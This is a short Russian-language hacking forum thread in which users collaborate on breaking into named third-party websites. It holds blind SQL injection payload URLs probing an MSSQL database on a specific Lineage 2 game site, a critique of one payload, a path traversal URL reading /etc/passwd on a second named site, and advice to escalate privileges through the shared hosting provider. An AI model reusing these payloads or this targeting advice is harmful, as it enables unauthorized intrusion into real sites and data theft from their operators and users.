Помогите пожалуйста со сложной Mssql инъекцией.
 

Собственно нашел одну инъекцию:
_http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')%20and%201=2--
_http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')%20and%201=1--

Юнион селект не хочет делать, через ; тоже не получается. Есть ли возможность исполнять команды типа update или возможность сделать select? Заранее спасибо.

читай http://rst.void.ru/papers/mysql_char_brute.txt
подбирай и перебирай через substring..
http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring(@@version,1,1))>100)--
http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring(@@version,1,1))>1)--

http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring('select+top+1+from+information_schema.tabl es',1,1))>120)--
http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring('select+top+1+from+information_schema.tabl es',1,1))>1)--

update никак не получится сделать? кстати в выражении http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring('select+top+1+from+in formation_schema.tables',1,1))>1)-- нет смысла, так как селект не вычисляется - ты задал его в виде строковой константы. То есть substring('select+top+1+from+information_schema.ta bles',1,100) = 'select+top+1+from+information_schema.tables'

А ты поля перебирал?
нет

http://la2shop.net/index.php?val=../../../../../../etc/passwd
На том же ip см. титли.
Вообще 1gb.ru дырявый до ужоса там винда права поднять банально ломай через хостинг